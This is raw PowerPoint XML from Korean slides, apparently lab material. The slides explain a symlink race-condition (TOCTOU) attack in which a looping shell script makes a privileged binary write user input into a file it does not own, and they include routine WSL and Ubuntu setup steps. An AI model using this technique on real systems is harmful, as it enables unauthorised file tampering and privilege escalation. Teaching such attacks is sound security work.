      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="표 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607BED53-6299-4A40-B0C5-1A7D3EC54E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3594578354"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="482536" y="3082831"/>
          <a:ext cx="5280914" cy="3105372"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5280914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="342704905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29400559"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1637506">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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작성한 쉘 스크립트는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바이너리를 실행하여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문자열이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저장되도록 하면서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링크가 되도록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성공할 때까지 위를 반복한다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0673885"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">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CF5E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="997999769"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139E61FA-04B8-4C98-B644-4375D7665294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276340" y="894926"/>
            <a:ext cx="5013960" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DB0B6D-C6B2-4A41-9210-653C8E5A0BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276340" y="2144754"/>
            <a:ext cx="4381500" cy="2788920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49DA5B94-3569-4EE5-ABD1-9698CB908CF2}"/>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2560571-A7C6-45E3-8D0C-5723ABFE29C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F28C6A0-1564-4EED-A362-90F0BA93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4B4AD2C1-C6C1-409C-AAD1-A6C6D29AC9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332303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993C7773-1E01-4A87-A5D3-84602AC344BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29366634"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492315" y="531781"/>
          <a:ext cx="5004689" cy="1955546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5004689">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="284761806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15364398"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="14538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sh</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old=`ls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while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"$old" ==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do</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6116800"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24783ED4-2DC3-467F-ACA5-CF48357CCA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1058589260"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286917" y="531781"/>
          <a:ext cx="5412768" cy="580050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358140" marR="0" indent="-3581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스크립트에 의해 실행된 프로세스들</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(createTempFile,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병렬적으로 실행되는 것이 아니라 컨텍스트 스위칭</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(context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switching)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통해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번갈아가며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다음 그림과 같은 형태로 실행될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pic>
        <p:nvPicPr>
          <p:cNvPr id="77828" name="_x618145072">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94716C9-27FA-45D6-8605-777D15AEE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623" y="1745774"/>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표 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDA30C07-719D-408A-92F7-58BAD7D1A866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1181481313"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492315" y="2788531"/>
          <a:ext cx="5412768" cy="3629183"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5412768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="811078406"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="20710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341117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① 파일 삭제 이전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② 파일 삭제 및 파일 생성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4135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mn-ea"/>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존재하지 않으므로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 소프트 링크의 소유자는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75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바이너리는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>fopen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연다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링크이므로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ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>소유의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62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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>의해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입력한 내용</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추가된다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6" name="화살표: 오른쪽 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16EF7B63-D41B-41A6-BA16-FE86C4B459F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5905500" y="3764280"/>
            <a:ext cx="381417" cy="220980"/>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07C8696C-F9A9-4276-AD2C-4B567D27DFC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AF2F096D-8477-4D4C-9E6A-C9F36C0C64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F0C6E2B-64BE-48D0-9A75-06D624ABA0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A0E72452-24B6-413E-8CEF-6EA8F5EEFF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5855759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4905" y="368998"/>
            <a:ext cx="5616792" cy="53231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_x1658365728">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BC1404B-71FF-41DC-B4B6-05D455009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13" y="943068"/>
            <a:ext cx="4622147" cy="3323713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="_x1659855720">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7205F5AD-930B-4C48-A1F2-2B29EB99D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804" y="798418"/>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표 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE27505-0E1B-4441-8F86-6B6670D21030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64389986"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286917" y="531781"/>
          <a:ext cx="5412768" cy="506898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⑤ 파일 닫기 이후 소프트 링크 생성 시도</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        <a:ea typeface="+mn-ea"/>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626110" marR="0" indent="-626110" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFontTx/>
                        <a:buChar char="-"/>
                      </a:pP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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="표 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E31B4F6-AB67-476A-AAE5-CDE1906087FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1172261686"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="494134" y="572958"/>
          <a:ext cx="5412768" cy="5801071"/>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③ 파일 생성 및 내용 쓰기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48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fopen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생성된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소유로 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④ 파일 쓰기 및 파일 닫기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10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8290BCC-9756-4035-B1DE-175E2F95E67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5763544"/>
            <a:ext cx="5616792" cy="72545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1" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{343D0A75-2BC9-477F-8697-646CB7E31E4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3387A-B307-4357-A242-F58470265E0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9F2AA83-5D2B-477F-A5C7-58C3C73712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97606A9-9E81-4DE7-B9F0-D65E6DDD3B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062957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설치를 완료하였다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 다시 컴퓨터 좌측 하단의 돋보기에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 검색하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 권한으로 터미널을 실행</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윈도우 터미널에 아래 명령어를 순서대로 입력해주세요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism.exe /online /enable-feature /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>featurename:Microsoft-Windows-Subsystem-Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /all /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism.exe /online /enable-feature /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>featurename:VirtualMachinePlatform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /all /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="9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5. 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 작업이 완료되었다면 설정을 적용하기 위해 컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>재부팅 후 마이크로소프트 스토어를 켜서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>우분투를 설치해준다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설치가 완료되면 스토어에서 실행 버튼을 누른다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“Installing, this may take a few minutes…” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 줄이 나올 때 까지 기다린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="그림 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DF1763B-0B00-4D2E-A132-5814BD8D8D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698632" y="938784"/>
            <a:ext cx="2574664" cy="2735580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4595BD3-7D0D-490B-B773-C065B3EDF894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="949071" y="4457817"/>
            <a:ext cx="3836289" cy="1890595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69CAE49D-319D-4B77-9EA6-A54E73A894E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356521" y="1161355"/>
            <a:ext cx="5231120" cy="1206173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FC8342-6507-4822-BF14-ECF2A18436B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356520" y="2576338"/>
            <a:ext cx="5231119" cy="1527015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F01FCDDF-6EEA-4443-B550-046EC016CF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949070" y="4877035"/>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A44303A4-1256-4FCA-9022-DF871E2A6DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949069" y="5528297"/>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EC9306F8-0CD3-4D9E-9461-769A6DC8B4D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9764724" y="1455769"/>
            <a:ext cx="1467043" cy="292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14BCCD89-2C3E-4CA5-A6BE-F9238C6AADA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10178540" y="3158773"/>
            <a:ext cx="1058565" cy="270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97B1EDFD-B47A-4168-B98D-8252C239C48B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356520" y="4832767"/>
            <a:ext cx="5231119" cy="1434199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="직사각형 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B67FD0CC-4F0B-46E1-9C63-0FBD15EFBF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10178540" y="5258310"/>
            <a:ext cx="923963" cy="214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 name="그룹 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
